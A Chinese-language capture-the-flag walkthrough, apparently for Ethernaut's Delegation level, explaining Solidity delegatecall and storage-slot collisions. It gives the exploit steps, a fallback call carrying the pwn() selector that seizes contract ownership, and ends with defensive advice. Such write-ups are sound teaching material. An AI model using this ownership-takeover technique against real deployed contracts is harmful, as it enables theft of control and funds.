委托調(diào)用（delegatecall）

委托調(diào)用是一種特殊的低級(jí)函數(shù)調(diào)用，旨在從另一個(gè)（通常是庫(kù)）合約中調(diào)用函數(shù)。

delegateCall（）的優(yōu)點(diǎn)是可以保留當(dāng)前調(diào)用合約環(huán)境的內(nèi)容。此環(huán)境包括其storage及其msg.sender，msg.value屬性。

以太坊將數(shù)據(jù)存儲(chǔ)在存儲(chǔ)“插槽”中，即32字節(jié)大小的插槽。每次將變量保存到存儲(chǔ)時(shí)，它會(huì)自動(dòng)占用當(dāng)前插槽中的剩余空間，或者按順序占用下一個(gè)插槽。

在下圖中，合約A向合約B的saveX（）函數(shù)發(fā)出委托調(diào)用，該函數(shù)最終會(huì)改變合同A的存儲(chǔ)。

首先，Contract A通過delegatecall調(diào)用saveX函數(shù)。委托調(diào)用覆蓋合約B的存儲(chǔ)與存儲(chǔ)調(diào)用合約akaStorage A.

接下來(lái)，執(zhí)行thesaveX函數(shù)。請(qǐng)注意，最初合約B存儲(chǔ)到存儲(chǔ)槽0中。因此，當(dāng)此函數(shù)現(xiàn)在引用變量bar時(shí)，再次查看槽0。

但是現(xiàn)在插槽0是引用指針foo，因此foo設(shè)置為x。bar仍然超出范圍，沒有受到影響。

當(dāng)合約A向合約B發(fā)出委托調(diào)用時(shí)，它允許合約B自由地改變其存儲(chǔ)A.

顯然，當(dāng)開發(fā)人員在不安全的存儲(chǔ)環(huán)境中使用delegatecall（）或從惡意庫(kù)繼承時(shí)，安全風(fēng)險(xiǎn)就會(huì)發(fā)生

如果存儲(chǔ)變量是通過低級(jí)的delegatecall訪問的，那么兩個(gè)合約的存儲(chǔ)布局必須對(duì)等，以便被調(diào)用合約能夠按名稱正確訪問調(diào)用合約的存儲(chǔ)變量。當(dāng)然，如果將存儲(chǔ)指針作為函數(shù)參數(shù)傳遞，就像在高級(jí)庫(kù)中那樣，情況就不是同了。

現(xiàn)在利用您對(duì)delegatecall（）的理解來(lái)獲得此級(jí)別合同的所有權(quán)！

細(xì)節(jié)演練

1、delegation.sol對(duì)庫(kù)合約delegaTIon.sol進(jìn)行delegatecall。

2、注意Delegate.sol有一個(gè)名為pwn（）的公共函數(shù)，它將所有者變量的所有權(quán)更改為調(diào)用該函數(shù)的任何人！

contract Delegate {

address public owner; // Occupies slot 0

。..

funcTIon pwn（） public {

owner = msg.sender; // Save msg.sender to slot 0

}

}

3、注意，委托合同的槽0也存儲(chǔ)了owner，確切地說是您想要更改的變量！此外，如果您設(shè)法調(diào)用DelegaTIon.sol中的回退函數(shù)來(lái)調(diào)用pwn（），您將成為調(diào)用合約的所有者。

funcTIon（） public {

if（delegate.delegatecall（msg.data）） {

this;

}

}

4、在以太坊中，您可以通過在事務(wù)中發(fā)送數(shù)據(jù)來(lái)調(diào)用公共函數(shù)。格式如下：

contractInstance.call（bytes4（sha3（“functionName（inputType）”））

5、使用Remix IDE或控制臺(tái)，調(diào)用Delegation.sol的回退功能：

// I did so in the console， having already computed

// the bytes4（sha3（“pwn（）”））

await sendTransaction（{

from： “0x1733d5adaccbe8057dba822ea74806361d181654”，

to： “0xe3895c413b0035512c029878d1ce4d8702d02320”，

data： “0xdd365b8b0000000000000000000000000000000000000000000000000000000000000000”

}）;

6、wait contract.owner（）顯示您現(xiàn)在是所有者！

提示：您可以執(zhí)行Remix調(diào)試器（在Javascript VM模式下）以查看存儲(chǔ)環(huán)境如何更改！ 您可以在Remix調(diào)試器的storage fully loaded列表中找到存儲(chǔ)插槽。

關(guān)鍵細(xì)節(jié)

· 使用更高級(jí)別的call（）函數(shù)繼承庫(kù)，特別是當(dāng)你i）不需要更改合同存儲(chǔ)和ii）不關(guān)心gas控制時(shí)。

· 更改合同存儲(chǔ)的庫(kù)繼承時(shí)，請(qǐng)確保將存儲(chǔ)插槽與庫(kù)的存儲(chǔ)插槽對(duì)齊，以避免出現(xiàn)這些邊緣情況。

· 對(duì)調(diào)用delegatecalls的函數(shù)進(jìn)行身份驗(yàn)證并進(jìn)行條件檢查。